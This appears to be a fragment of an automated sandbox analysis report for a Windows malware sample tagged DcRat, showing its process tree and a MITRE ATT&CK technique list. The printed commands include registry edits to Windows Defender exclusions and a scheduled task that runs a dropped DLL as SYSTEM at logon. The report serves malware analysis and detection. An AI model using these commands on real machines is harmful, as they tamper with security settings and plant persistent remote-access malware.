C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\RbFjslR.exe sG /site_id 525403 /S
1⤵
PID:1068

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "booXbIzkEgfNdKvxAC"
2⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:3060

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:5264

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:3692

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:5340

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\QMuGxDzxU\CbCNPA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "cPyDayBYNpjUpuO" /V1 /F
2⤵
- DcRat
- Creates scheduled task(s)
PID:3176

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 524 -p 5788 -ip 5788
1⤵
PID:1032

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

New Service

T1050

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Hidden Files and Directories

T1158

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery